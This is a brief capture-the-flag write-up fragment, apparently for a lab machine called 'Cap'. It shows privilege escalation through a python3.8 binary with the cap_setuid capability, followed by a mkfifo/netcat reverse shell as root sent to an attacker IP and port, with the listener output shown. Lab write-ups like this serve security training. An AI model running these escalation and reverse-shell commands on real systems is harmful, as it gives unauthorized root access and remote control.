4 privesc
PEAS
Files with capabilities (limited to 50):
/usr/bin/python3.8 = cap_setuid,cap_net_bind_service+eip
nathan@cap:~$ python3 -c 'import os; os.setuid(0); os.system("whoami;id;uname -a")'
root
uid=0(root) gid=1001(nathan) groups=1001(nathan)
Linux cap 5.4.0-73-generic #82-Ubuntu SMP Wed Apr 14 17:39:42 UTC 2021 x86_64 x86_64 x86_64 GNU/Linux
nathan@cap:~$ python3 -c 'import os; os.setuid(0); os.system("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.16.161 7070 >/tmp/f")'
$ rlwrap nc -lvnp 7070
listening on [any] 7070 ...
connect to [10.10.16.161] from (UNKNOWN) [10.10.10.245] 40008
whoami;id
whoami;id
root
uid=0(root) gid=1001(nathan) groups=1001(nathan)
Last updated